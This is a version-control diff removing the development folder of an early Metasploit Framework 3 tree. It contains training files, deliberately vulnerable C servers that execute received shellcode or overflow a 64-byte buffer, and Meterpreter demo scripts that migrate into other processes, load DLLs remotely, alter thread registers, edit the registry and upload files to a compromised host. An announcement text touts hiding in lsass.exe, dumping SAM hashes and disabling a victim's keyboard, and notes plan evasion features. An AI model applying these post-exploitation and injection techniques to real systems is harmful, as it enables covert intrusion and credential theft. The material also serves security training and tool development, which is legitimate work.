\color{HexyGreen}70 \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39
\color{HexyGreen}80 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a 3a 3a \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 00 00 00 00 00
\color{HexyGreen}b0 \color{Hexy57}39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39
\color{HexyGreen}c0 \color{Hexy17}11 11 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}d0 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy58}3a \color{Hexy0}00 00 00 00 00 00 00 00 00
\color{HexyGreen}e0 \color{Hexy58}3a \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy16}10 10
\end{semiverbatim}
}

BIN
dev/materials/cansecwest05/shi0.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 3.7 KiB

BIN
dev/materials/cansecwest05/shi1.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.7 KiB

BIN
dev/materials/cansecwest05/shi2.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.7 KiB

BIN
dev/materials/cansecwest05/shi3.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.9 KiB

BIN
dev/materials/cansecwest05/shi4.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.9 KiB

BIN
dev/materials/cansecwest05/shi5.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 5.0 KiB

BIN
dev/materials/cansecwest05/shi6.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.7 KiB

BIN
dev/materials/cansecwest05/shi7.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 4.6 KiB

BIN
dev/materials/cansecwest05/shi8.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 3.5 KiB

BIN
dev/materials/msf3_internals_training/diagrams/Diagrams.vsd
View File

Binary file not shown.

BIN
dev/materials/msf3_internals_training/diagrams/flowcharts.vsd
View File

Binary file not shown.

BIN
dev/materials/msf3_internals_training/documentation/ruby/RubyCheat.pdf
View File

Binary file not shown.

BIN
dev/materials/msf3_internals_training/documentation/ruby/RubyCheat1.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 37 KiB

BIN
dev/materials/msf3_internals_training/documentation/ruby/RubyCheat2.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 42 KiB

BIN
dev/materials/msf3_internals_training/documentation/ruby/ruby-doc-bundle.tar.gz
View File

Binary file not shown.

19
dev/materials/msf3_internals_training/examples/modules/auxiliary/bh_aux.rb
View File

@ -1,19 +0,0 @@
module Msf
class Auxiliary::BhAux < Msf::Auxiliary
def initialize
super(
'Name' => "BlackHat Training Auxiliary Module",
'Description' => "Example Auxiliary Module",
'Author' => "skape",
'License' => MSF_LICENSE)
end
def run
print_status("Inside run...")
end
end
end

22
dev/materials/msf3_internals_training/examples/modules/encoders/bh_encoder.rb
View File

@ -1,22 +0,0 @@
module Msf
module Encoders
class BlackHatEncoder < Msf::Encoder
def initialize
super(
'Name' => 'BlackHat Example Encoder',
'Version' => '$Revision: 3154 $',
'Description' => %q{
Sample encoder that just returns the block it's passed
when encoding occurs.
},
'Author' => 'skape',
'Arch' => ARCH_ALL)
end
def encode_block(state, buf)
buf
end
end ;end ;end

12
dev/materials/msf3_internals_training/examples/plugins/bob_plugin.rb
View File

@ -1,12 +0,0 @@
module Msf
class Plugin::Bob < Msf::Plugin
module BobExtension
def bob
"bob"
end
end
def initialize(framework, options)
framework.extend(BobExtension)
end
end
end

BIN
dev/materials/msf3_internals_training/slides/bh_training_deck.ppt
View File

Binary file not shown.

116
dev/materials/msf3_internals_training/tools/srv.c
View File

@ -1,116 +0,0 @@
/*
* srv.c -- Example server for easy exploiting
*
* Usage: srv <port>
*
* Example:
*
* C:\> srv 1234
* C:\> nload localhost 1234 -s code.s
*
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#if defined _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif
#define SERVER_PORT 5433
#define MAX_PENDING 1
int ehlo, from;
/* Main function */
int main(int argc, char **argv) {
struct sockaddr_in sin;
char buf[8092], *ptr;
int c, i, len, port;
int s, new_s, bytes;
#if defined _WIN32
int wsaret;
WSADATA wsaData;
#endif
int (*funct)();
/* Command line parameters */
if (argv[1])
port = atoi(argv[1]);
else
port = SERVER_PORT;
#if defined _WIN32
/* Initialize winsock */
wsaret = WSAStartup(0x101, &wsaData);
if(wsaret != 0)
return (0);
/* Create a socket */
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
exit(1);
}
#else
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
exit(1);
}
#endif
/* Initialize the addres data structure */
memset((void *)&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(port);
/* Bind an address to the socket */
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
exit(1);
}
/* Set the length of the listen queue */
if (listen(s, MAX_PENDING) < 0) {
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
exit(1);
}
len = sizeof(sin);
new_s = accept(s, (struct sockaddr *)&sin, &len);
memset(buf, 0, sizeof(buf));
bytes = recv(new_s, buf, sizeof(buf), 0);
printf("recv'd %d\n", bytes);
/* Run the code */
fprintf(stderr,"Oops.. I'm 0wned.\n");
__asm mov edi, new_s
funct = (int (*)()) buf;
(int)(*funct)();
return (0);
}

BIN
dev/materials/msf3_internals_training/tools/srv.exe
View File

Binary file not shown.

123
dev/materials/msf3_internals_training/tools/srvloop.c
View File

@ -1,123 +0,0 @@
#include <stdio.h>
#include <string.h>
#include <errno.h>
#if defined _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif
#define SERVER_PORT 5432
#define MAX_PENDING 1
int ehlo, from;
/* Main function */
void Runner(int new_s);
int main(int argc, char **argv) {
struct sockaddr_in sin;
char buf[8092], *ptr;
int c, i, len, port;
int s, new_s, bytes;
#if defined _WIN32
int wsaret;
WSADATA wsaData;
#endif
int (*funct)();
/* Command line parameters */
if (argv[1])
port = atoi(argv[1]);
else
port = SERVER_PORT;
#if defined _WIN32
/* Initialize winsock */
wsaret = WSAStartup(0x101, &wsaData);
if(wsaret != 0)
return (0);
/* Create a socket */
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
exit(1);
}
#else
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
exit(1);
}
#endif
/* Initialize the addres data structure */
memset((void *)&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(port);
/* Bind an address to the socket */
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
exit(1);
}
/* Set the length of the listen queue */
if (listen(s, MAX_PENDING) < 0) {
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
exit(1);
}
while (1)
{
__try
{
len = sizeof(sin);
new_s = accept(s, (struct sockaddr *)&sin, &len);
CloseHandle(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Runner, (void *)new_s, 0, NULL));
} __except(EXCEPTION_EXECUTE_HANDLER)
{
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
}
}
return (0);
}
void Runner(int new_s)
{
char buf[8092];
int len;
int bytes;
int (*funct)();
__try
{
memset(buf, 0, sizeof(buf));
bytes = recv(new_s, buf, sizeof(buf), 0);
printf("recv'd %d\n", bytes);
__asm mov edi, new_s
funct = (int (*)()) buf;
(int)(*funct)();
} __except(EXCEPTION_EXECUTE_HANDLER)
{
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
}
}

BIN
dev/materials/msf3_internals_training/tools/srvloop.exe
View File

Binary file not shown.

119
dev/materials/msf3_internals_training/tools/vulnsrv.c
View File

@ -1,119 +0,0 @@
#include <stdio.h>
#include <string.h>
#include <errno.h>
//#include <windows.h>
#if defined _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif
#define SERVER_PORT 5432
#define MAX_PENDING 1
int ehlo, from;
/* Main function */
void Runner(int new_s);
int main(int argc, char **argv) {
struct sockaddr_in sin;
char buf[8092], *ptr;
int c, i, len, port;
int s, new_s, bytes;
#if defined _WIN32
int wsaret;
WSADATA wsaData;
#endif
int (*funct)();
/* Command line parameters */
if (argv[1])
port = atoi(argv[1]);
else
port = SERVER_PORT;
#if defined _WIN32
/* Initialize winsock */
wsaret = WSAStartup(0x101, &wsaData);
if(wsaret != 0)
return (0);
/* Create a socket */
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
exit(1);
}
#else
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
exit(1);
}
#endif
/* Initialize the addres data structure */
memset((void *)&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(port);
/* Bind an address to the socket */
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
exit(1);
}
/* Set the length of the listen queue */
if (listen(s, MAX_PENDING) < 0) {
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
exit(1);
}
while (1)
{
__try
{
len = sizeof(sin);
new_s = accept(s, (struct sockaddr *)&sin, &len);
CloseHandle(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Runner, (void *)new_s, 0, NULL));
} __except(EXCEPTION_EXECUTE_HANDLER)
{
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
}
}
return (0);
}
void RunnerStuff(int sock)
{
char buf[64];
int bytes;
bytes = recv(sock, buf, 3048, 0);
printf("recv'd %d\n", bytes);
}
void Runner(int new_s)
{
char buf[4096];
RunnerStuff(new_s);
fprintf(stderr, "done");
}

18
dev/merge.sh
View File

@ -1,18 +0,0 @@
#!/bin/sh
export DEV=/projects/metasploit/framework3/trunk/
export SBL=/projects/metasploit/framework3/tags/framework-3.0/
export FIL=$1
echo "[*] Gathering svn information..."
TMP=`tempfile mergeXXXXXXX`
svn log --limit 1 "${DEV}${FIL}" | egrep -v '^r[0-9]+|^--|^$' > $TMP
echo "[*] Copying file ${FIL}..."
cp ${DEV}${FIL} ${SBL}${FIL}
echo "[*] Merging file ${FIL}..."
svn add ${SBL}${FIL} >/dev/null 2>&1
svn commit --non-interactive -F $TMP ${SBL}${FIL}
rm -f $TMP

19
dev/meterpreter/DemoClient.rb
View File

@ -1,19 +0,0 @@
#!/usr/bin/env ruby -I../../lib
require 'Rex/Post'
class DemoClient
def initialize(host, port)
self.sock = TCPSocket.new(host, port)
self.client = Rex::Post::Meterpreter::Client.new(sock)
self.client.core.use('Stdapi')
end
attr_reader :client
protected
attr_accessor :sock
attr_writer :client
end

5
dev/meterpreter/demo1.html
View File

@ -1,5 +0,0 @@
<html>
<center>
<h1>Metasploit Post-Exploitation Demo</h1>
</center>
</html>

19
dev/meterpreter/demo_migrate.rb
View File

@ -1,19 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
client = DemoClient.new(host, port).client
pid = client.sys.process['calc.exe']
puts "before migrate: my pid is #{client.sys.process.getpid}"
client.core.migrate(pid)
puts "after migrate: my pid is #{client.sys.process.getpid}"
while (1)
select nil, nil, nil, 5
end

16
dev/meterpreter/demo_mirror_dir.rb
View File

@ -1,16 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
src_dir = ARGV[2] || "%WINDIR%\\inf"
dst_dir = ARGV[3] || "/tmp/mirror_demo"
client = DemoClient.new(host, port).client
begin
Dir.mkdir(dst_dir)
rescue
end
client.fs.dir.download(dst_dir, src_dir, true)

16
dev/meterpreter/demo_mirror_dir2.rb
View File

@ -1,16 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
src_dir = ARGV[2] || "/tmp/mirror_src_demo"
dst_dir = ARGV[3] || "c:\\personal\\temp\\dst_mirror"
client = DemoClient.new(host, port).client
begin
client.fs.dir.mkdir(dst_dir)
rescue
end
client.fs.dir.upload(dst_dir, src_dir, true)

13
dev/meterpreter/demo_site.rb
View File

@ -1,13 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
HTML_FILE = "demo1.html"
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
client = DemoClient.new(host, port).client
client.fs.file.upload('%TEMP%', HTML_FILE)
client.sys.process.execute('cmd /C "explorer %TEMP%\demo1.html"')

39
dev/meterpreter/demo_socket.rb
View File

@ -1,39 +0,0 @@
#!/usr/bin/env ruby -I. -I../../lib
require 'DemoClient'
require 'Rex/Socket/Parameters'
host = ARGV[0] || '127.0.0.1'
port = ARGV[1] || '12345'
client = DemoClient.new(host, port).client
# Create a parameter representation class based on the perl-style hash
# elements
params = Rex::Socket::Parameters.new(
'PeerHost' => '128.242.160.3',
'PeerPort' => 25,
'Proto' => 'tcp')
# Create the socket for this connection
socket = client.net.socket.create(params)
# Send GET / HTTP/1.0
socket.send("HELO hick.org\r\n")
data = socket.recv
puts "#{data}"
socket.send("QUIT\r\n")
socket.sock.shutdown(1)
while ((data = socket.recv) != nil)
puts "#{data}"
end
puts "Finished"
#while (1)
# select nil, nil, nil, 5
#end

361
dev/meterpreter/metcli.rb
View File

@ -1,361 +0,0 @@
#!/usr/bin/env ruby -I../../lib
require 'Rex/Post'
netconf = false
ui = false
net = false
fseek = false
dir = false
process = true
registry = false
copy = false
sock = TCPSocket.new('127.0.0.1', 12345)
client = Rex::Post::Meterpreter::Client.new(sock)
client.core.use(
'Stdapi')
puts "Client interface:"
client.dump_extension_tree.each { |x|
puts "\t#{x}"
}
puts "\n\n"
if (net)
s = client.net.create_channel(
'PeerHost' => '128.242.160.3',
'PeerPort' => '80',
'Proto' => 'tcp')
puts "writing 'GET / HTTP/1.0'..."
s.write("GET / HTTP/1.0\r\n\r\n")
puts "reading in 20 bytes from the socket:\n#{s.read(20)}"
s.close
end
if (copy)
puts "Uploading...\n"
client.fs.file.upload("c:\\personal\\temp\\mirror", "/bin/cat", "/tmp/dog")
puts "Downloading...\n"
client.fs.file.download("/tmp/test", "c:\\personal\\temp\\ati3duag.dll",
"c:\\personal\\temp\\blah.asm", "c:\\personal\\temp\\boa.tar.gz")
end
if (netconf)
puts "Routes:\n\n"
client.net.config.each_route { |route|
puts route.pretty
}
puts "\n\nInterfaces:\n\n"
client.net.config.each_interface { |interface|
puts interface.pretty
}
client.net.config.add_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
puts "after adding 1.2.3.4 route\n\n"
client.net.config.each_route { |route|
puts route.pretty
}
client.net.config.remove_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
puts "after removing 1.2.3.4 route\n\n"
client.net.config.each_route { |route|
puts route.pretty
}
end
if (ui)
input = false
puts "idle time: #{client.ui.idle_time}"
sleep 60
puts "idle time: #{client.ui.idle_time}"
if (input)
puts "disabling"
# client.ui.disable_keyboard
client.ui.disable_mouse
sleep 60
puts "enabling"
# client.ui.enable_keyboard
client.ui.enable_mouse
puts "done"
end
end
if (fseek)
f = client.fs.file.new("c:\\personal\\temp\\hm.c")
puts "current position: #{f.tell}"
puts "some text:\n#{f.read}"
puts "current position: #{f.tell}"
f.seek(0, IO::SEEK_SET)
puts "current position: #{f.tell}"
puts "some text again:\n#{f.read}"
f.seek(40, IO::SEEK_SET)
puts "eof? #{f.eof}"
puts "current position: #{f.tell}"
puts "some text again:\n#{f.read}"
begin
puts "some text again:\n#{f.read}"
puts "some text again:\n#{f.read}"
rescue EOFError
puts "got eof"
rescue
puts "got other"
end
puts "eof? #{f.eof}"
end
if (dir)
puts "Testing dir...\n\n"
puts "%WINDIR% is #{client.fs.file.expand_path('%WINDIR%')}"
puts "Getting contents of C:\\"
client.fs.dir.foreach("C:\\") { |name|
puts "\t#{name}\n"
}
puts "working directory: #{client.fs.dir.pwd}"
client.fs.dir.chdir("..")
puts "working directory: #{client.fs.dir.getwd}"
client.fs.dir.chdir("c:\\windows")
puts "working directory: #{client.fs.dir.pwd}"
client.fs.dir.mkdir("c:\\personal\\temp\\tester")
client.fs.dir.unlink("c:\\personal\\temp\\tester")
s = client.fs.filestat.new("C:\\Windows\\notepad.exe")
puts s.pretty
puts client.fs.file.stat("C:\\windows\\notepad.exe").mtime
# open a file and read in some text
f = client.fs.file.new("C:\\personal\\temp\\hm.c")
puts "some text:\n #{f.read}"
f.close
end
if (process)
puts "Testing process...\n\n"
puts "exploited pid is #{client.sys.process.getpid}"
puts "exploited name is #{client.sys.process.open.name}"
puts "exploited path is #{client.sys.process.open.path}"
##
#
# enumeration testing
#
##
debug_pid = client.sys.process['calc.exe']
puts "pid of calc.exe is #{debug_pid}"
#client.sys.process.kill(debug_pid)
##
#
# Load a library in another process
#
##
p = client.sys.process.open(debug_pid)
base = p.image.load('zipfldr.dll')
printf "loaded zipfldr.dll into #{p.pid} at %.8x\n", base
addr = p.image.get_procedure_address('zipfldr.dll', 'RouteTheCall')
printf "addr of RouteTheCall is: %.8x\n", addr
p.image.unload(base)
puts "unloaded it"
##
#
# Execution
#
##
p = client.sys.process.execute("cmd.exe", nil,
{
'Channelized' => true
})
d = p.io.read
puts "read from cmd.exe:\n#{d}"
p.io.write("dir\n")
d = p.io.read
puts "read from cmd.exe:\n#{d}"
##
#
# threads
#
##
p = client.sys.process.open(debug_pid)
p.thread.each_thread { |id|
puts "thread id: #{id}"
thread = p.thread.open(id)
puts "suspending..."
thread.suspend
puts "registers:\n"
puts thread.pretty_regs
thread.set_regs(
'eax' => 0x41414141,
'ebx' => 0xdeadbeef)
puts thread.pretty_regs
puts "resuming..."
thread.resume
puts "closing..."
thread.close
}
##
#
# code injection
#
##
#buf = p.memory.allocate(400)
#p.memory.write(buf, "\xcc")
#p.thread.create(buf)
#p.close
##
#
# image testing
#
##
exp = client.sys.process.open
addr = exp.image.load('wininet.dll')
printf "wininet.dll is loaded at: %.8x\n", addr
exp.image.unload(addr)
printf "LoadLibraryA is at: %.8x\n", exp.image.get_procedure_address('kernel32.dll', 'LoadLibraryA')
printf "ntdll.dll base is at: %.8x\n", exp.image['ntdll.dll']
##
#
# memory testing
#
##
p = client.sys.process.open(debug_pid, PROCESS_ALL)
addr = p.memory.allocate(400, PROT_WRITE | PROT_READ)
printf "allocated memory at %.8x\n", addr
p.memory.write(addr, 'this is a test yo')
data = p.memory.read(addr, 10)
printf "read memory from %.8x (#{data.length}): #{data.to_s}\n", addr
info = p.memory.query(addr)
printf "addr: %.8x (size=%d, prot=%.8x)\n", addr, info['RegionSize'], info['Protect']
if (p.memory.writable?(addr))
puts "memory is writable like it should be\n"
end
p.memory.protect(addr, info['RegionSize'], PROT_READ)
if (!p.memory.writable?(addr))
puts "memory is NOT writable like it should be\n"
else
puts "memory is writable but it should not be\n"
end
begin
p.memory.write(addr, 'test again')
rescue
puts "caught exception like expected during write #{$!}"
end
p.close
# attach to the exploited process
exp = client.sys.process.open
addr = exp.memory.allocate(400, PROT_WRITE)
exp.memory.lock(addr, 4096)
exp.memory.unlock(addr, 4096)
exp.close
end
if (registry)
puts "Testing registry...\n\n"
regkey = client.sys.registry.open_key(HKEY_CURRENT_USER,
'Software', KEY_ALL_ACCESS)
puts "hkey is #{regkey.hkey}"
regkey.set_value('test123', REG_SZ, 'yo what up')
regkey.set_value('testdword', REG_DWORD, '666')
val = regkey.query_value('test123')
val2 = regkey.query_value('testdword')
puts "value name: #{val.name} type: #{val.type} data: '#{val.data}'"
puts "value name: #{val2.name} type: #{val2.type} data: '#{val2.data}'"
val.set('ho ho ho')
val.delete
regkey.enum_key.each { |key|
puts "child key: #{key}"
}
regkey.enum_value.each { |value|
puts "child value: #{value.name}"
}
k = regkey.create_key('TestKey')
k.close
regkey.delete_key('TestKey')
regkey.close
end
while (true)
printf("sup\n")
select nil, nil, nil, 4
end

22
dev/meterpreter/mrp.rb
View File

@ -1,22 +0,0 @@
#!/usr/bin/env ruby
$: << 'lib' << '../lib' << '../../lib'
require 'socket'
require 'rex'
require 'rex/post/meterpreter'
if(ARGV.length != 2)
puts "usage: <ip> <port>"
exit(1)
end
sock = TCPSocket.new(ARGV[0], ARGV[1])
c = Rex::Post::Meterpreter::Client.new(sock)
c.core.use('Stdapi')
@c = c
irb

6
dev/meterpreter/todo
View File

@ -1,6 +0,0 @@
- make it so packet dispatcher does not wait if timeout is 0
- priv
- add commands to search out efs files and download them

30
dev/msf3/TODO
View File

@ -1,30 +0,0 @@
This file contains things that need to be done that aren't in the plan:
- revisit pivoting
- connections seemed slow
- data transfers seemed slow
Buggies:
- An exploit that has Compat = -find in the Payload section will still list
meterpreter's find_tag payload as compatible
- The target info should provide a packing function that matches the arch and
platform set in the target. Right now all exploits are calling big or little
packers on the target, regardless of the target arch.
- If the Authors is supplied as an array, with only a single author, and
that author isnt in the known list, a crash will occur.
./user_interfaces/../lib/rex/ui/text/dispatcher_shell.rb:184:in `run_command'
./user_interfaces/../lib/rex/transformer.rb:30:in `transform'
./user_interfaces/../lib/rex/transformer.rb:29:in `transform'
./user_interfaces/../lib/msf/core/module/author.rb:29:in `transform'
./user_interfaces/../lib/msf/core/module.rb:108:in `initialize'
./user_interfaces/../lib/msf/core/exploit.rb:170:in `initialize'
./user_interfaces/../lib/msf/core/exploit/tcp.rb:16:in `initialize'
./user_interfaces/../lib/msf/core/exploit/ftp.rb:19:in `initialize'
/home/projects/metasploit/rubyhacks/modules/exploits/windows/ftp/freeftpd_user.rb:62:in `initialize'
./user_interfaces/../lib/msf/core/module_manager.rb:47:in `create'
./user_interfaces/../lib/msf/core/module_manager.rb:251:in `create'
./user_interfaces/../lib/msf/ui/console/command_dispatcher/core.rb:871:in `cmd_use'

18
dev/msf3/bugs
View File

@ -1,18 +0,0 @@
msf/core
- encoding is slow sometimes, profile it
meterpreter
- migration sometimes does partial reads of stages leading to crashes
- should switch to inlined staging in request packet
msfconsole
- jobs -k on the same exploit twice leads to exception
win32 bugs
- 'gets' blocks
- http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/151367
- works in cmd.exe
- does not work in rxvt (kbhit just keeps returning 0)
X - no HOME variable by default -- need to use another directory

53
dev/msf3/design.txt
View File

@ -1,53 +0,0 @@
Major subsystems
----------------
rex (lib/rex)
Contains generic classes that are used by various libraries
and by framework-core and other subsystems.
framework-core (lib/msf/core)
Provides the interface for interacting with modules, managing
sessions, and coordinating exploitation.
framework-base (lib/msf/base)
Implementations of the default sessions included in the
framework, such as Meterpreter, and other various elements
that are outside of the scope of framework-core. This
subsystem also provides a simple wrapper to framework-core
insofar as dealing with exploitation, encoding, payload,
and session interaction.
Dependencies
------------
+------------------+
| Rex |
+------------------+
^
|
|
|
+------------------+
| framework-core |
+------------------+
^
|
|
|
+------------------+
| framework-base |
+------------------+
^ ^
/ \
/ \
/ \
+-----------------+ +-----------------+
| user interface | | modules |
+-----------------+ +-----------------+
| msfconsole | | encoders |
| msfweb | | exploits |
| msfgtk | | payloads |
+-----------------+ +-----------------+

7
dev/msf3/guidelines.txt
View File

@ -1,7 +0,0 @@
-= Logging
The following descriptions explain when each log level should be used.

22
dev/msf3/msf3.features
View File

@ -1,22 +0,0 @@
- meterpreter
- many more advanced commands
- in-memory process migration
- disable/enable user input (keyboard/mouse)
- check remote idle time
- pivot through hosts
- interact with processes, threads, files, and the registry
- load DLLs into remote processes
- dump SAM database hashes
- irb mode
- msfconsole
- multiple concurrent sessions
- session backgrounding
- exploit backgrounding
- multiple concurrent exploits
- especially useful for passive exploits, like clientside bugs
- irb mode
- msfopcode
- new command line interface to opcode db
- msfd
- daemonized version of msfconsole
- all clients share the same framework instance

111
dev/msf3/msf_alpha_announce.txt
View File

@ -1,111 +0,0 @@
The Metasploit staff is proud to present the 3.0 alpha release of the Metasploit
Framework. This release marks a major milestone in the evolution of the
framework, and it's one that the staff hopes will push the framework into even
wider acceptance. The major differences between the 3.0 version of the
framework and prior versions center around one basic goal: automation. It has
become clear that the processes involved in performing a penetration test are
generally monotonous and could be easily streamlined, at least in part. For
that reason, many aspects of the framework have been designed with a focus on
making it easy for the builtin code to be easy to work with at a scripting
level. Furthermore, a keen interest has been put into making it possible to
augment and extend the framework's functionality beyond the scope to which it
has already been applied.
While this high-level description of the enhancements offerred by the 3.0
version may be fairly abstract, a number of particularly interesting
enhancements can be shown to give the impression of just what's in store.
== The Console Interface
The Metasploit console interface, msfconsole, has roughly the same look and feel,
but some of the more notable changes include:
- Backgrounded exploits
It's now possible to execute an exploit in the background. This means you
can have an exploit that triggers a passive vulnerability (such as a browser
bug) while aggressively doing other tasks.
- Multi-session exploits
Unlike the 2.x version of the framework, the 3.0 version is capable of
creating multiple sessions from a single exploit. This is especially useful
in the context of passive exploits that can have multiple clients
connecting.
- Multiple concurrent sessions
It is possible to have more than one active session established.
- IRB mode
Like Meterpreter, the console interface supports dropping into a ruby
scripting interface that makes it possible to directly interact with the
framework. This makes it possible to do low-level interaction with
sessions and framework modules.
== The Meterpreter
The meterpreter that is included in the 3.0 version of the framework is almost
nothing like what exists in the 2.0 version. The underlying architecture and
design remains the same, but the feature set and interface has been greatly
enhanced to not only make scripting the post-exploitation process possible but
to also increase the level of functionality. Instead of having separate modules
for each of the major subsystems (Fs, Process, Net, Sys), the 3.0 version of the
meterpreter has merged all of these common elements into one extension called
Stdapi, short for the Standard API. This API provides access to the file
system, registry, network, threads, processes, user interface, and much more.
Some of the cooler features of the new version of meterpreter include:
- In-memory process migration
This feature makes it possible to migrate the meterpreter server instance to
a completely different process, such as a system service like lsass.exe,
without having to establish a new connection. This means that if you
exploit an HTTP server and re-use the port 80 connection for the meterpreter
session, then it's possible to appear almost completely transparent due to
the elimination of the need to create a new connection. Furthermore,
migrating to a privileged process has the added benefit of making the server
impossible to kill without taking down the whole machine.
- Disabling user keyboard and mouse input
This feature makes it possible to prevent local keyboard and mouse input.
- SAM database hash retrieval
The SAM juicer extension that Vinnie Liu authored has been integrated into a
more generalized privilege escalation extension known as 'priv'. In the
future, this extension will provide local privilege escalation exploits.
- Advanced process manipulation
The 3.0 version of meterpreter has extensive support for interacting with
processes in terms of loading and unloading DLLs; reading, writing,
querying, allocating, and freeing memory; opening, creating, closing,
terminating, suspending, querying, and modifying threads; writing, and
reading standard input output, and so on.
- IRB mode
This feature is especially cool for all of the scripters out there. It
allows a user to drop into an interactive ruby shell that can be used to use
meterpreter at the scripting level rather than at the user-interface level.
This can be very useful because the scripting level features are far more
powerful and featureful than the user-interface.
- Network pivoting
Like other products, the 3.0 version of the framework supports seamless
pivoting through meterpreter. The 2.x branch of the framework had very
minimal support for this feature, but the 3.0 version is planned to have
much more robust support.
This release is meant to serve as a method of getting feedback and
correcting bugs prior to entering a true beta period. There are many features
that have not been completely implemented at this point and there are still some
edges that will need to be roughed out prior to the final release. Some of the
major features that have not been completed are:
- Native Windows support (due to interpreter issues)
- msfweb exploit and session interfaces

21
dev/msf3/notes.txt
View File

@ -1,21 +0,0 @@
evasion
- new command: 'evasion'
- -l, list evasion subsystems
- set evasion subsystem level
- get evasion subsystem level
- set global evasion level
- get global evasion level
- modules cache evasion level at creation time
- modules pass evasion flags onto sockets via params
